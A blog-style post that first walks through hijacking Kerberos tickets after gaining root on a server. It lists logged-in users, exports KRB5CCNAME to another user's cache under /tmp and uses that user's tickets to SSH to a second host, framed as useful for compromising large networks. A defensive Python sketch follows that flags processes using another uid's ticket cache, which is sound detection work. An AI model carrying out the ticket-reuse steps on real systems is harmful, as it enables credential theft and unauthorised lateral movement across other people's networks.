After obtaining root, or the shell of a logged-in user, on one of the servers that use Kerberos, proceed as follows:
[root@test3.xxoxx.com ~]# whoami
root
[root@test3.xxoxx.com ~]# klist -f
klist: No credentials cache found (ticket cache FILE:/tmp/krb5cc_0)
Kerberos 4 ticket cache: /tmp/tkt0
klist: You have no tickets cached

See who is online, then use their session:

[root@test3.xxoxx.com ~]# w
17:39:30 up 11 days, 22:34, 2 users, load average: 0.00, 0.00, 0.00
USER     TTY    FROM             LOGIN@  IDLE    JCPU   PCPU   WHAT
xiaoyu   pts/1  test4.xxoxx.com  16:47   40.00s  0.00s  0.00s  -bash
root     pts/2  test6.xxoxx.com  17:32   0.00s   0.00s  0.00s  w
[root@test3.xxoxx.com ~]# ls /tmp
krb5cc_1025_p11225 krb5cc_1025_Z11358
[root@test3.xxoxx.com ~]# export KRB5CCNAME=FILE:/tmp/krb5cc_1025_Z11358
[root@test3.xxoxx.com ~]# klist -f
Ticket cache: FILE:/tmp/krb5cc_1025_Z11358
Default principal: xiaoyu@xxoxx.COM
Valid starting     Expires            Service principal
05/11/09 16:47:09  05/12/09 16:47:09  krbtgt/xxoxx.COM@xxoxx.COM
    Flags: FIA
05/11/09 16:52:19  05/12/09 16:47:09  host/test0.xxoxx.com@xxoxx.COM
    Flags: FAT
05/11/09 16:55:45  05/12/09 16:47:09  host/test2.xxoxx.com@xxoxx.COM
    Flags: FAT
Kerberos 4 ticket cache: /tmp/tkt0
klist: You have no tickets cached

Of course, Kerberos login has to be enabled on test2.xxoxx.com:

[root@test3.xxoxx.com ~]# ssh xiaoyu@test2.xxoxx.com
-bash-3.00$
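By changing where the KRB5CCNAME environment variable points, you can use a logged-in user's tickets to log in to other machines, which is somewhat useful when XX-ing a large network. I have to say, I really have no creativity when naming machines; it is always xxoxx, sigh~~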
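Seen from the defending side, the session above leaves a trace: a process running as one uid with KRB5CCNAME pointing at another uid's cache file. The following detection sketch is an added example, not part of the original post; the function names, the PIDs in the sample and the reliance on the krb5cc_<uid> naming shown in the listing are assumptions.

```python
import os
import re

# Assumption: caches follow the krb5cc_<uid>[_suffix] naming seen in the listing above.
CCACHE_RE = re.compile(r"^(?:FILE:)?(/.*krb5cc_(\d+)(?:_[^/]*)?)$")

def parse_krb5ccname(environ: bytes):
    """Return (path, uid_in_name) for a FILE cache named in an environ blob, else None."""
    for entry in environ.split(b"\0"):
        if entry.startswith(b"KRB5CCNAME="):
            value = entry[len(b"KRB5CCNAME="):].decode(errors="replace")
            m = CCACHE_RE.match(value)
            return (m.group(1), int(m.group(2))) if m else None
    return None

def foreign_ccache_use(procs):
    """procs: iterable of (pid, uid, environ). Return those using another uid's cache."""
    findings = []
    for pid, uid, environ in procs:
        hit = parse_krb5ccname(environ)
        if hit and hit[1] != uid:
            findings.append((pid, uid, hit[0], hit[1]))
    return findings

def live_processes():
    """Yield (pid, uid, environ) from Linux /proc; run as root to see every process."""
    for name in filter(str.isdigit, os.listdir("/proc")):
        try:
            uid = os.stat(f"/proc/{name}").st_uid  # uid owning /proc/<pid>
            with open(f"/proc/{name}/environ", "rb") as fh:
                yield int(name), uid, fh.read()
        except OSError:
            continue  # process exited or is unreadable

# Constructed sample (PIDs invented) modelled on the session above. environ holds the
# exec-time environment, so the export is visible on children such as ssh, not on the
# shell that ran it.
SAMPLE = [
    (11358, 1025, b"USER=xiaoyu\0KRB5CCNAME=FILE:/tmp/krb5cc_1025_Z11358\0"),
    (20001, 0, b"USER=root\0HOME=/root\0"),
    (20417, 0, b"USER=root\0KRB5CCNAME=FILE:/tmp/krb5cc_1025_Z11358\0"),
]

if __name__ == "__main__":
    source = live_processes() if os.path.isdir("/proc") else SAMPLE
    for pid, uid, path, owner in foreign_ccache_use(source):
        print(f"pid {pid} (uid {uid}) uses ticket cache {path} of uid {owner}")
```

Privilege changes that keep the caller's environment can produce the same mismatch, so findings need a look at the parent process before they are treated as ticket reuse.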